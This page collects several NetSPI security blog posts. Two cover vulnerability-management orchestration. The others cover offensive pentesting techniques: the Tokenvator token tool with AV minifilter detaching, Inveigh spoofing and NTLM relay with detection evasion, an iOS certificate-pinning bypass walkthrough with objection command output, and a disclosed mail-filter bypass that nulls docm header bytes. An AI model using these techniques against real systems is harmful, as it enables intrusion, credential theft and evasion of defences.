Back

What's Next and New with NetSPI Resolve

Here at NetSPI, we see firsthand the struggles enterprises face to fix vulnerabilities. It’s concerning when our pentesters and customers continue to find the same vulnerabilities that have yet to be remediated – at the same client, year after year.

The struggle faced by enterprises in managing vulnerabilities is not limited to manual penetration testing results. Scanners find millions of vulnerabilities in our customer environments, and we see the sheer volume overwhelming their remediation efforts. Even if 99% of assets can be fixed within a reasonable time-frame, a dangerous window of opportunity is allowed to persist if the last 1% lingers.

We’re taking action to help our customers solve this challenge. Fortunately, we have a solid foundation from which to tackle the problem.

Our own penetration testing platform, NetSPI Resolve 6, was built for the purpose of managing our own penetration testing process. The Resolve software platform has given NetSPI the competitive edge in pentesting by allowing our pentesters to spend more time on testing and less time on overhead tasks.

Resolve works by:

  1. Ingesting vulnerabilities from any source: scanners and manual pentesting reports
  2. Normalizing the definition of the vulnerabilities to a standard rubric
  3. Correlating the vulnerabilities to de-duplicate and compress the findings
  4. Automatically generating reports

Customers have approached us about whether they could use Resolve in their own environments to help them conquer their challenges. We agreed. Since that time, we’ve licensed the use of the Resolve platform to the benefit many organizations, especially those with pentesters.

Now we’re taking the next step. You see, Resolve wasn’t built for vulnerability management and orchestration, which is the key need facing the majority of our customers.

So we’re leveraging the great features of Resolve 6 we at NetSPI use to manage pentesting and expanding the platform to serve the larger vulnerability management and orchestration market. For the past year, we’ve been rebuilding the Resolve platform for the next generation, Resolve 7.

Resolve 7 will be a service-oriented architecture that scales to the massive data needs of our customers. It will be web-based, using a virtual appliance for easy deployment. We are adding more administration features, such as field-level role-based access control (RBAC) permissions, granular security groups, and single-sign on (SSO) support, to make the platform enterprise-ready out of the box. We’ve added a vulnerability orchestration component with an integration engine to complement the powerful vulnerability correlation engine. And we’re building a new user interface with expanded capabilities for reporting and business intelligence visualizations.

We’re building Resolve 7 for you – so you can help stem the tide of your vulnerability flood. We’ll showcase new features of Resolve in coming posts, so stay tuned.

Contact us for more information about the availability of NetSPI Resolve 7.0.

Back

Tokenvator: Release 2

What is Tokenvator?

Tokenvator is a token manipulation utility that is primarily used to alter the privileges of a process. In the original release we primarily focused on elevating process privileges. In this release, in addition to the usual bug fixes and improving existing features, I added several new features:

  • The ability to display additional token information
  • A help command that’s actually useful
  • Disabling and Removing Token Privileges
  • Named Pipe Tokens
  • Minifilter Manipulation

Use Cases:

There are a multitude of instances where elevating privilege or duplicating another processes token is necessary to proceed on an assessment. Most credential theft mechanisms require SYSTEM privileges, and now an impersonated SYSTEM token may not be enough. Tokenvator now tries to not only impersonate tokens, but also tries to start the process with a primary token.

Samdump

Displaying Token Information:

It can be useful to know some limited information about the token. For instance, just because you’re impersonating a token doesn’t mean you inherit all the privileges of the token. For instance, not all SYSTEM tokens are created or impersonated identically.

In the example below we are operating as SYSTEM but are still in our original groups.

Img Ba Ba Bc C

However, in the second example below, we got SYSTEM via the command GetSystem and are operating as SYSTEM and are placed in the relevant groups for SYSTEM.

Img Ba Ba C Bf

In this final example we got SYSTEM via the command GetSystem cmd.exe which used the same token to start a new process.

Img Ba Ba E Bf D

Help Command Changes

In the first release, the help command left a lot to be desired, when the author of the tool can’t remember how to run the command and the help menu doesn’t help him… there might be a problem.  So some changes were may to provide some additional help for each supported method.  Below is an example.

Img Ba C F C

Img Ba C Ffe Da

Token Privilege Modifications:

In the previous release it was possible to enable a privilege on a process. In this example we are enabling SeSystemEnvironmentPrivilege on LogonUI.

Img Ba C Dd D

That’s neat, but what if we wanted to remove privileges from a process?

Tokenvator now supports disabling or deleting a privilege placed on a process. In this instance we first disable and then remove the SeDebugPrivilege from the Powershell 6 process (pwsh.exe).

Disable Remove

But what if we really don’t want a process to have any privileges on a system? That is possible as well. In this example we remove all the privilege held by the splunkd process token. My intent is not to pick on Splunk, splunkd was just the first thing in my lab that met the example criteria. 😉

Nuke

Named Pipe Tokens

There are instances where we don’t  have the SeDebugPrivilege and thus cannot open a process we do not own. In these instances, we need a different method to GetSystem. This is where named pipes come into play. Via the Windows API’s we have the native ability to impersonate anyone who connects to our named pipe.

Img Ba C C

This can be useful in other situations where services connect to a known named pipe name. In these instances, we can create an arbitrary named pipe and steal the remote processes token as soon as they connect and write to our pipe. For processes that use named pipes for inter process communication this opens up a potential attack surface.

Img Ba C F B

Minifilters:

Many defensive products use hooks to intercept calls to check for malicious activity. Microsoft has strongly suggested that when it comes to the file system, vendors do not hook calls but instead use Minifilters which will be passed the file system data. AV / EDR products are given a specified altitude or precedence in which they are to inspect the file. This aspect of them also makes them trivial to identify.

Below are the Minifilters associated with Windows Defender and vShield.

Img Ba C Bdf

Img Ba C Af

DeviceMup is the Minifilter associated with UNC paths. To detach the filter monitoring network paths we can run a simple command. Note: Not all Minifilters can be detached, however many, many can be. This is because not all filters programmed with an unload routine, which prevents Minifilters from gracefully unloading.

Img Ba C F A

In the following demo we are going to be detaching a Minifilter from a file system so that we can run our tool while the AV product is still running.

Filters

If you’re looking for a more permanent way to disable Minifilters, I would suggest looking at this registry key.

Img Ba C B Ed

So that’s all for this release. Thank you to everyone took the time to file bug reports and let me know how they were using the tool. And a special thank you to those who submitted pull requests for this release. If you have any suggestions or feature requests please feel free to let me know.

Back

Inveigh – What's New in Version 1.4

Ugh, I can’t believe it’s been a year and a half since the last release of Inveigh. I had intended to complete a new version back in March. At that time, my goals were to perform some refactoring, incorporate dynamic DNS updates, and add the ability to work with shares through NTLM challenge/response relay. In the end, the refactoring is really the only thing that went as planned. Oh well, September isn’t really all that far past March, right?

Wait, what’s an Inveigh?

If you aren’t familiar with Inveigh, here’s how I describe it on the wiki:

“Inveigh is a PowerShell LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. At its core, Inveigh is a .NET packet sniffer that listens for and responds to LLMNR/mDNS/NBNS requests while also capturing incoming NTLMv1/NTLMv2 authentication attempts over the Windows SMB service. The primary advantage of this packet sniffing method on Windows is that port conflicts with default running services are avoided. Inveigh also contains HTTP/HTTPS/Proxy listeners for capturing incoming authentication requests and performing attacks. Inveigh relies on creating multiple runspaces to load the sniffer, listeners, and control functions within a single shell and PowerShell process.”

I often hear people simply say, “Inveigh is the PowerShell version of Responder.” Which always makes mumble to myself about packet sniffing and other design differences that are probably meaningless to most. Regardless of how Inveigh is described though, if you have used Responder, Inveigh’s functionality will be easy to understand. The main difference being that where Responder is the go to tool for performing LLMNR/NBNS spoofing attacks, Inveigh is more for PowerShell based Windows post-exploitation use cases.

Inveigh

What’s new in Inveigh 1.4

In this blog post, I’ll go through the following major additions and details related to Inveigh 1.4:

Invoke-Inveigh Additions

Invoke-Inveigh is the main LLMNR, mDNS, and NBNS spoofing module.

ADIDNS Attacks

For a detailed explanation of ADIDNS attack techniques, see my blog post on the subject.

Inveigh now contains the following two optional ADIDNS attacks:

  • Wildcard – Inveigh will add a wildcard record to ADIDNS at startup.

Inveigh Wildcard

  • Combo – Inveigh keeps track of LLMNR/NBNS name requests. If the module sees the same request from a specified number of different systems, a matching record will be added to ADIDNS.

Inveigh Combo

Inveigh’s automated approach may not always be the best way to perform ADIDNS attacks, for manual options, see my Powermad project.

Note, the ADIDNS attacks ended up replacing and extending the role I had originally planned for dynamic DNS updates. I removed the dynamic DNS update code that existed in some of the early 1.4 dev versions.

Additional Detection Evasion Options

There are lots of tools designed to detect LLMNR and/or NBNS spoofers. Last year at DerbyCon, Beau Bullock, Brian Fehrman, and Derek Banks released CredDefense. This toolkit contains a spoofer detection tool named ResponderGuard. This tool can send requests directly to a host IP address rather than the traditional multicast/broadcast addresses. This technique has the added benefit of allowing detection across subnet boundaries. Inveigh can now detect and ignore these types of requests in order to help avoid detection.

I’ve also been noticing that endpoint protection products are leveraging agents to detect LLMNR/NBNS spoofers. If you see lots of random requests originating from each workstation, this detection technique is potentially in use. The ideal evasion technique is to watch the request traffic and pick out specific, potentially safe names to spoof. However, in an attempt to automate evading this type of detection, I’ve added the option to prevent Inveigh from responding to specific name requests unless they have been seen a specified number of times and/or from a specified number of different hosts. This should help weed out the randoms at the cost of skipping less frequent legitimate requests.

Invoke-InveighRelay Additions

Invoke-InveighRelay is the HTTP, HTTPS, and Proxy to SMB relay module. I may have gotten a little carried away with the additions to this module for just a single release. The file share functionality lead to maintaining authenticated SMB sessions, which begged for more targets, which inspired target enumeration (thanks Scott!), which reminded me of BloodHound, and now it’s September.

Relay Attacks

The new version contains the following three SMB2.1 compatible attacks:

  • Enumerate – The enumerate attack can perform Group, User, Share, and NetSession enumeration against a target.
  • Execute – Performs PSExec style command execution. In previous versions of Inveigh Relay, this was the only available attack. Note, I removed SMB1 support.
  • Session – Inveigh Relay can now establish and maintain privileged/unprivileged authenticated SMB sessions. The sessions can be accessed with Invoke-SMBClient, Invoke-SMBEnum, and Invoke-SMBExec from my Invoke-TheHash project. Inveigh Relay will attempt to keep the sessions open as long as the module is running.

Inveigh Relay

Inveigh Relay will accept any combination of the three attacks chained together.

Disclaimer, I didn’t originally design the Invoke-TheHash SMB tools with with this type of usage in mind. I will likely need to at least beef up the SMB error handling.

Multiple Target Handling

Previously, Inveigh Relay could only target a single system. With the addition of the session attack, I thought it made sense add the capability to target multiple systems without restarting the module. My initial implementation attempts focused on simply identifying valid targets and preventing things like unnecessarily performing the same source/destination relays over and over.

Later, after I created Invoke-SMBEnum for performing enumeration tasks, I started thinking that it would be useful to incorporate the enumeration code directly into Inveigh Relay. This would allow me to leverage the results, combined with incoming user session information obtained through relay, for making targeting decisions. Basically, the module would gather as much information about the environment as possible through unprivileged user relays and attempt to use that information to find relay source/target combinations that will provide privilege or access to file shares.

Inveigh Relay stores the following target information in memory, most of which is used for targeting decisions:

  • IP – Target’s current IP address.
  • Hostname – Target’s hostname.
  • DNS Domain – Target’s AD domain in DNS format.
  • NetBIOS Domain – Target’s AD domain in NetBIOS format.
  • Sessions – Target’s identified user sessions.
  • Administrators Users – Local Administrators group, user members.
  • Administrators Groups – Local Administrators group, group members.
  • Privileged – Users with command execution privilege on the target.
  • Shares – Target’s custom share if any.
  • NetSessions – Target’s NetSessions minus the NetSessions generated through the relay process.
  • NetSession Mapped – User sessions discovered through enumerating NetSessions on other targets.
  • Local Users – Target’s local users.
  • SMB2.1 – Status of SMB2.1 support on the target.
  • Signing – Status of SMB signing requirements on the target.
  • SMB Server – Whether or not SMB is running and accessible on the target.
  • DNS Record – Whether or not a DNS record was found if a lookup was performed.
  • IPv6 Only – Whether or not the host is IPv6 only.
  • Targeted – Timestamp for when the target was last targeted.
  • Enumerate – Timestamp for when the target was last enumerated with the ‘Enumerate’ attack.
  • Execute – Timestamp for the last time command execution was performed through the ‘Execute’ attack on the target.

Inveigh Enumerate

One quick note regarding unprivileged system enumeration. You will likely encounter more and more systems that do not allow some forms of unprivileged enumeration. See this post from Microsoft for more details.

So far, Inveigh Relay uses the following priority list to select a target:

  1. Local Administrators Group (User Members) – The module will lookup previously observed user sessions attached to an incoming connection. Next, Inveigh Relay will search for matches in the target pool’s enumerated local Administrators groups.
  2. Local Administrators Group (Nested Group Members) – The module will lookup previously observed user sessions attached to an incoming connection. Next, Inveigh Relay will attempt to identify AD group membership for the sessions. Finally, the module will search for group matches in the target pool’s enumerated local Administrators groups. Note, Inveigh Relay alone does not have the ability to enumerate Active Directory (AD) group membership
  3. NetSessions –  The module will get the IP address of an incoming connection. Next, Inveigh Relay will search for matches within the target pool’s NetSessions. For example, if an incoming connection originates from ‘192.168.1.100’ any system with a NetSession that contains ‘192.168.1.100’ is a potential target.
  4. Custom Shares – The module will target systems that host custom shares (not defaults like C$, IPC$, etc) that may be worth browsing with multiple users.
  5. Random – The module will optionally select a random target in the event an eligible target has not been found through the above steps. Inveigh Relay will apply logic to prioritize and exclude targets from within the random target pool.

Inveigh Target

BloodHound Integration

Once I started putting together targeting based on enumeration, I was of course reminded of the awesome BloodHound project. Since I consider Inveigh’s default state to be running from a compromised AD system, access to AD has usually already been achieved. With AD access, BloodHound can gather most of the same information as Inveigh Relay’s Enumerate attack with the bonus of having visibility into AD group membership.

When using imported BloodHound data, think of Inveigh Relay as one degree of local privilege whereas BloodHound is six degrees of domain admin. Inveigh Relay does not have full BloodHound path visibility. It is still a good idea to identify and specify relay targets which will grant the access required for the engagement goals.

Second disclaimer, I’ve mostly just tested targeting through BloodHound data in my lab environments. There are probably plenty of scenarios that can throw off the targeting, especially with large environments. I’ll continue to make adjustments to the targeting.

ConvertTo-Inveigh

ConvertTo-Inveigh is a new support function capable of importing BloodHound’s groups, computers, and sessions JSON files into memory.

Convertto Inveigh

Project Links

Here are links to all of the projects mentioned in this blog post:

Inveigh: https://github.com/Kevin-Robertson/Inveigh

Invoke-TheHash: https://github.com/Kevin-Robertson/Invoke-TheHash

Powermad: https://github.com/Kevin-Robertson/Powermad

BloodHound: https://github.com/BloodHoundAD/BloodHound

Responder: https://github.com/lgandx/Responder

CredDefense Toolkit: https://github.com/CredDefense/CredDefense

What’s next for Inveigh?

For this version, I need to update the wiki, perform lots of targeting tweaks, and fix bugs. After that, I’m not entirely sure. There is certainly more to explore with BloodHound integration such as exporting session information collected through Inveigh. I’d also like to revisit my original unreleased C# PoC version of Inveigh. As for today though, I’m just happy to have finally escaped my dev branch.

Questions?

If you have any questions, reach out to me @kevin_robertson on Twitter or the amazingly helpful BloodHound Gang slack. Also, feel free to say hi if you see me wandering around DerbyCon!

Back

Four Ways to Bypass iOS SSL Verification and Certificate Pinning

A couple months ago, Cody Wass released a blog on how to bypass SSL verification and certificate pinning for Android. I thought it would be a great idea to write up some techniques that I’ve found to work well for iOS. To reiterate from Cody’s blog, being able to perform man-in-the-middle (MITM) attacks is a crucial part of any standard penetration test. This allows us to intercept and fuzz all HTTP requests and find any security vulnerabilities. In the examples below, I will be using Burp Suite as my web proxy. This blog assumes that the reader is somewhat familiar with iOS, Xcode, and setting up their phone and Burp to intercept mobile HTTP traffic in iOS. In this blog Ill cover the following four techniques to bypass SSL verifification and certificate pinning in iOS:

  • Installing your own CA
  • Installing Software to iOS Device
  • Using Objection and Frida
  • Using disassemblers to modify IPA file

Technique 1 – Installing Your Own CA

Installing your own CA is the first step to getting rid of SSL errors. Installing your CA is relatively easy inside of iOS. The first step is to get the CA onto the device. This could be done through opening an email attachment or downloading the certificate. First off, configure your mobile device and web proxy to be able to intercept web traffic. Specifically, for Burp Suite, you can simply browse to https://burp and click on “CA Certificate”.

Next you will be prompted to “Install” the certificate as seen below.

Img B Df C Fe A

Clicking on install prompts a warning that the certificate you are going to install will be added to the list of trusted certificates.

Img B Ded A

You can verify that the certificate is installed by going into Settings > General > Profile. In iOS 10.3 and later, you will need to manually trust the installed certificate by going to Settings > General > About > Certificate Trust Settings and enable trust for that certificate.

Img Bc A B Ac Be

Technique 2  –  Installing Software to iOS Device

If you’re still getting SSL errors, or the application itself dies waiting for a connection, there is a chance the application server is using some sort of TLS chain validation or SSL certificate pinning.  The simplest method to bypass SSL certificate pinning is to install software that does all the hard work for us. The tools listed below are easy to setup and get running.

Installation instructions are listed on each of the webpages. However, with these methods, a jailbroken iOS device is required. In recent years, having a jailbroken device with the current iOS version has become increasingly difficult.

Technique 3 – Using Objection and Frida

Another proven method is to use Frida hooks and Objection. At a very high-level, Frida is a framework that allows you to interfere with an application’s code at runtime. Specifically, interfering with the logic behind certificate validation. This is limited to using jailbroken devices. However, we can use the Frida Gadget, which has the full arsenal of the framework, but we do not need a jailbroken device. Even more good news, Objection is a wrapper for this framework and will do all the hard work for us!

First off, you will need a valid provisioning profile and a code-signing certificate from an Apple Developer account. You can create a valid provisioning profile by creating a test application within Xcode and you can register for a free developer account here.

Once the test project is created, the next step is to setup the code-signing certificate. First, open Xcode preferences and then select “Accounts”. To add your Apple ID account click on the plus sign in the lower left-hand corner and sign into your account. Next click on “Manage Certificates” in the lower right-hand corner.

Img B D Cad

Clicking on that button brings us to the screen below. To create a certificate, click on the plus sign in the lower left-hand box and select “iOS Development”. Once that loads, click “Done” and then “Download Manual Profiles” which then loads the certificate onto the computer.

Img B E Ba

Once you have the code-signing certificate loaded onto your computer, you can find it by running the following command:

NetSPIs-MacBook-Pro:Test netspi$ security find-identity

Policy: X.509 Basic
Matching identities
1) A[REDACTED]1 "iPhone Developer: [REDACTED]@netspi.com ([REDACTED])"
2) 0[REDACTED]C "iPhone Developer: [REDACTED]@netspi.com ([REDACTED])"
2 identities found

Valid identities only
1) A[REDACTED]1 "iPhone Developer: [REDACTED]@netspi.com ([REDACTED])"
2) 0[REDACTED]C "iPhone Developer: [REDACTED]@netspi.com ([REDACTED])"
2 valid identities found

We want to load the Frida Gadget dynamic library to be able to modify the application at runtime. In the context of an iOS application, we want to extract the IPA file, modify the binary to load the FridaGadget.dylib, code-sign the binary and dylib, then repackage the updated IPA file. As mentioned previously, we can use Objection to automatically do all this work. This can be done with the simple command below where -s is the IPA file and -c is the code-signing certificate.

NetSPIs-MacBook-Pro:NetSPI netspi$ objection patchipa -s netspi_test.ipa -c 0[REDACTED]C
Using latest Github gadget version: 12.0.3
Remote FridaGadget version is v12.0.3, local is v12.0.1. Downloading...
Downloading from: https://github.com/frida/frida/releases/download/12.0.3/frida-gadget-12.0.3-ios-universal.dylib.xz
Downloading iOS dylib to /Users/netspi/.objection/ios/FridaGadget.dylib.xz...
Unpacking /Users/netspi/.objection/ios/FridaGadget.dylib.xz...
Cleaning up downloaded archives...
Patcher will be using Gadget version: 12.0.3
No provision file specified, searching for one...
Found provision file /Users/netspi/Library/Developer/Xcode/DerivedData/test-fbleootdcdwdyafhyzjmvihvfiga/Build/Products/Debug-iphoneos/test.app/embedded.mobileprovision expiring in 307 days, 1:40:03.015176
Found a valid provisioning profile
Working with app: NetSPI.app
Bundle identifier is: com.netspi.test
Codesigning 13 .dylib's with signature 0[REDACTED]C
Code signing: libswiftDarwin.dylib
Code signing: libswiftUIKit.dylib
Code signing: libswiftCoreImage.dylib
Code signing: libswiftos.dylib
Code signing: libswiftObjectiveC.dylib
Code signing: libswiftCoreGraphics.dylib
Code signing: FridaGadget.dylib
Code signing: libswiftCore.dylib
Code signing: libswiftCoreFoundation.dylib
Code signing: libswiftMetal.dylib
Code signing: libswiftQuartzCore.dylib
Code signing: libswiftFoundation.dylib
Code signing: libswiftDispatch.dylib
Creating new archive with patched contents...
Codesigning patched IPA...
Cannot find entitlements in binary. Using defaults

Copying final ipa from /var/folders/1k/mw7w1kfd4c96jkvkw5mp3qfm0000gn/T/netspi_test-frida-codesigned.ipa to current directory...
Cleaning up temp files...

Once the command has finished running, we have a new IPA file called netspi_test-frida-codesigned.ipa which we can then use to deploy to the iOS device. There is a handy tool called
ios-deploy which can work with non-jailbroken iOS devices. There are several different options you can use depending on what you want to accomplish e.g.(run a debugger, deploy app over USB, etc.).

To use ios-deploy, unzip the IPA file and run the ios-deploy command. In the example below, I specified I want to deploy the application over USB (-W) and I specified the bundle I want to deploy (-b).

NetSPIs-MacBook-Pro:NetSPI netspi$ ios-deploy -W -b ./Payload/NetSPI.app
[....] Waiting for iOS device to be connected
[....] Using 3ff9c90d2b23beadeefdf7bc240211730c84adef (P105AP, iPad mini, iphoneos, armv7) a.k.a. 'MAPen's iPad'.
------ Install phase ------
[ 0%] Found 3ff9c90d2b23beadeefdf7bc240211730c84adef (P105AP, iPad mini, iphoneos, armv7) a.k.a. 'MAPen's iPad' connected through USB, beginning install
[ 5%] Copying /Users/netspi/test/NetSPI/Payload/NetSPI.app/META-INF/ to device
[TRUNCATED]
[ 52%] CreatingStagingDirectory
[ 57%] ExtractingPackage
[ 60%] InspectingPackage
[ 60%] TakingInstallLock
[ 65%] PreflightingApplication
[ 65%] InstallingEmbeddedProfile
[ 70%] VerifyingApplication
[ 75%] CreatingContainer
[ 80%] InstallingApplication
[ 85%] PostflightingApplication
[ 90%] SandboxingApplication
[ 95%] GeneratingApplicationMap
[100%] Installed package ./Payload/NetSPI.app

Now we have the app installed on our iOS device, next is to open the application and connect to it via Objection.

NetSPIs-MacBook-Pro:NetSPI netspi$ objection explore
_ _ _ _
___| |_ |_|___ ___| |_|_|___ ___
| . | . | | | -_| _| _| | . | |
|___|___|_| |___|___|_| |_|___|_|_|
|___|(object)inject(ion) v1.3.0

Runtime Mobile Exploration
by: @leonjza from @sensepost

[tab] for command suggestions
com.netspi.test on (iPad: 9.0.1) [usb] #

Now all that is left is to run the built-in command that bypasses the certificate validation and you can begin proxying traffic.

com.netspi.test on (iPad: 9.0.1) [usb] # ios sslpinning disable
Job: b748974e-ed6d-4aaf-b5ea-3fb35a13720a - Starting
[3fb35a13720a] [ios-ssl-pinning-bypass] [NSURLSession] Found 1 matches for URLSession:didReceiveChallenge:completionHandler:
[3fb35a13720a] [ios-ssl-pinning-bypass] [NSURLConnection] Found 5 matches for connection:willSendRequestForAuthenticationChallenge:
[3fb35a13720a] [ios-ssl-pinning-bypass] Hooking lower level method: SSLSetSessionOption
[3fb35a13720a] [ios-ssl-pinning-bypass] Hooking lower level method: SSLCreateContext
[3fb35a13720a] [ios-ssl-pinning-bypass] Hooking lower level method: SSLHandshake
Job: b748974e-ed6d-4aaf-b5ea-3fb35a13720a - Started

Technique 4 – Using disassemblers to modify IPA file

If the above techniques fail, or you would like to try something more difficult, there is always the option to use disassemblers to be able to modify the IPA file to bypass any certificate validation. Disassembling an iOS application is out of scope for this blog, but some of the more common disassemblers are Hopper and IDA. Once the binary has been loaded into the application, following the logic behind what functions are called when the mobile application attempts to make an SSL connection with the application server can point you in the right direction of where the certificate pinning is taking place. Modifying the IPA will most likely break the signed application and it cannot be installed on an iOS device. Resigning the IPA file will allow you to install the mobile app.

Conclusion

Being able to view and modify HTTP requests sent to the server from the mobile application is an essential part of any penetration test. This allows us testers to get an inside view of how application functionality works. The methods described in this blog are the ones we use during our assessments to view and manipulate traffic when presented with SSL certificate errors and pinning. If you have any questions or have techniques that work for you, comment below!

References

* Edit 10/18/18: Added additional step to technique 1 for iOS 10.3 and later.

Back

How to Streamline Pentest Data to Security Orchestration

Previously, we discussed best practices for tracking vulnerability data through to remediation. In this post, we’re explore the challenge of streamlining human penetration testing (pentesting) data into the vulnerability orchestration process. We provide three best practices you can use when engaging a third-party pentesting company to ensure the pentesting data is delivered in a way that is compatible with your security orchestration process.

Pentesting is an essential threat and vulnerability management process used to discover some of the most important vulnerabilities in your environment. Human pentesters find vulnerabilities that scanners can’t catch, but an attacker will find. The challenge often becomes how to track and remediate those vulnerabilities after the test is complete.

Two Challenges of Pentesting Data for Security Orchestration

Vulnerability scanners use known data formats that don’t change often, which is easy to incorporate into security orchestration tools. Once you’ve integrated your scan results into a vulnerability orchestration process and normalized them, you have some confidence that the process will continue to work as designed. In comparison, pentesters often do not follow a known data format and may add information to the report, in addition to the specific findings.

Findings from third-party penetration testing companies often arrive as a static report in PDF format. This format makes it difficult to streamline those results in an automated way when you expect a standard input. Some reports may come with a CSV file of the findings, which provides a more structured data format, but correlating those findings with existing vulnerabilities may require manual review.

The pentesting company’s report may include custom information. This documents the vendor’s work and shows they did more than a scan, it presents problems for streamlining that data into an orchestrated process – especially if the information must be enriched before sending it to the remediation resources. For instance, the remediation recommendations or the described business impact may not align with your corporate policy. You may disagree with their severity assessment, for example, because you have more knowledge of the asset’s importance or mitigating factors in your environment.

Three Best Practices for Pentest Data Compatibility

Receiving formatted, structured pentest results from a penetration testing company allows you to streamline your vulnerability orchestration process and track the findings through to remediation. The following three best practices can help align the pentest data with your organization’s process.

Provide a template for your expected data format. The data format for the pentest findings must be predefined for your vulnerability orchestration and automation to work properly. You know your format, but the pentesting company doesn’t. Share your format prior to engaging the vendor to ensure they will accommodate your requirements. The best pentesting company will be able to deliver the results in a structured format that’s customized for you.

Provide a reference rubric with IDs for your common vulnerability types. Consider your normalization requirements for vulnerability definitions. If you’ve standardized the common ones, provide a reference rubric that can be added to the results. This rubric will allow you to correlate the test results with an associated reference directly to an existing definition. Once you’ve put the formatted, structured pentest results into your orchestration process, you can track to remediation.

Provide a retest template. When submitting a retest request, ensure that the vendor’s output matches an expected format so you can automate the data marking for closing the vulnerabilities that have been verified. This might be the same format you started with, or it might be a simpler retest template for the vendor to fill out.

These three best practices can help you ensure the pentesting data is compatible with your vulnerability orchestration process.

Next Steps

Read the earlier posts in this series:

Back

An Approach to Bypassing Mail Filters

TLDR

By “nulling” the first one or two bytes of a docm file, some spam filters will allow a malicious document to be delivered despite being explicitly blocked. Upon opening the docm file, Microsoft Word gives the option to repair the document, which allows for the potential execution of a macro embedded in the document.

A number of vendors have independently verified this bypass as an issue, so naturally it’s time to write a blog post. While macro-enabled documents were the focus of our testing, the same methodology could apply to many other file types and applications.

Background

Suppose an email filter is configured to block macro-enabled Word documents (docm), how does that filter decide whether a particular sample is of a “docm” type to support a filtering decision?

Generally, we believe this occurs in two ways, although not always in tandem or mutually exclusive:

  1. Extension: The user-friendly way to mark files, this is no more than a string “extension” to the end of a file name. Simply put, extensions provide a nice way to keep track of file types, and are generally used as a shortcut for the operating system to improve user experience. Windows will use a file extension to lookup file registration info in the registry, allowing Windows to pass execution to the correct program with the file as an (optional) argument.
  2. Header:  Files can be further recognized by a particular file header, as a result of the file format. Most file types have a well defined structure, and the first 2-24 bytes, commonly referred to as “Magic Bytes”, usually provide a good indication of its contents. You can find a good list of these at https://www.garykessler.net/library/file_sigs.html for anyone curious. Some quick examples:
    1. MZ (4d 5a) for PE files (exe, dll, sys)
    2. PK (50 4b) for zip files (zip, docm)
  3. Contents (Bonus) : With the use of more exhaustive parsing, a file could be identified based on its holistic structure matching a known format. Naturally this is rare in filtering mechanisms due to the computational cost of parsing.

In regards to bypassing a mail filter, consider the following:

  • A malicious file is created which would normally match an explicit block rule.
  • The contents of the file header is tampered with to bypass “in-transit” filtering.
  • A file extension is chosen to direct execution to a specific application
  • The file is still considered “valid” by the application and executed (semi-)normally.

Testing Parameters

As mentioned above, we were specifically interested in the filtering mechanisms for “Macro-Enabled Word Documents” or DOCM files.

Payload: PlanetExpress.docm, a OpenXML (Office 07+) formatted document with the following embedded macro.

Sub Document_Open()
    MsgBox "Hello!"
End Sub

Delivery Technique: PlanetExpress.docm directly attached to a an e-mail that is delivered to Outlook.

Defense: A mail product configured to block all macro-enabled files, but allow any traditional documents. Each mail filtering product has a different process for handling incoming documents. For example, the first product we tested, all documents were inspected by the filter regardless of blocking rules put in place. Each document was opened, parsed, and inspected. If the document was deemed safe, a link to the document would be sent to the user, rather than the document itself.

The Classic Phish

For our first test we simply changed the file extension from .docm to .doc. This is a common technique, and probably the “original” technique to hide the fact a document with a macro is being sent in. This technique can fool users but not a modern mail filter, as expected this file was blocked every time.

Testing the Extension (Attempt #1)

For our first real attempt at bypassing the filter, we removed the extension completely. To our surprise, the mail filter allowed the document through unopened, unparsed, and uninspected. However, if the user attempted to open the PlanetExpress file, Windows would present a prompt asking which application should be used to handle the file.

Testing the Extension and the File Header (Attempt #2)

For our next attempt, we changed the file extension from .docm to .doc, and nulled the first byte of the file header, as follows:

Again, to our surprise this got past the filter and was delivered to the users inbox (unopened, unparsed, and uninspected). However, if the user opened the document, the ‘File Conversion’ dialog box is brought up by Word.

Putting the Pieces Together (Attempt #3)

We knew from the previous test that we could use any extension, so long as the first byte or two were nulled out. The challenge then became to find something a Windows program could execute, despite being a corrupt file. In our final test, we kept the original docm extension and nulled the first byte of the file header. The email was again delivered, but interestingly enough, Word handled the corruption differently:

  1. When the corruption is detected, it apologizes for not being able to open the document.
  2. Clicking ‘OK’, we get an option to repair the file.
  3. Clicking ‘Yes’, we get a brand new file called ‘Document1’.
Corruption Detection
Corruption Repair
Word produces a repaired document

However, when we click ‘Enable Content’, we don’t get the message box from our macro. Why? Well, it’s because Word has created a new “Document1” and our old macro, while still there, won’t be executed until next time we open the file. This is not very useful from an attack standpoint, but a simple macro change will get us execution, change the macro to:

Sub Document_New()
    MsgBox "Hello!"
End Sub

Now when we click through the prompts and enable macros, we are warmly greeted by some macro execution.

Execution!

Conclusion

This was a relatively simple attack that came from simply questioning our assumptions about mail filters. While the addition of some user prompts, and the requirement for a docm extension are not ideal, this does represent an interesting proof of concept that has successfully bypassed mail filtering in the real world. A number of other scenarios involving extensions, original formats, and header tampering have since been attempted, but we feel the attempts above concisely convey the general process.

Here are the steps for the working attack:

  1. Create a macro-enabled Word document
  2. Add a Document_New macro as above and save the document
  3. Open the document in a hex editor and null out the first byte, re-save the file
  4. Email the document to your victim and wait patiently for profit

Vendor Response

  • Mimecast: Fixed (2017)
  • Barracuda: Fixed (2018)
  • Microsoft: Non-issue citing “user action required” (2017)

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X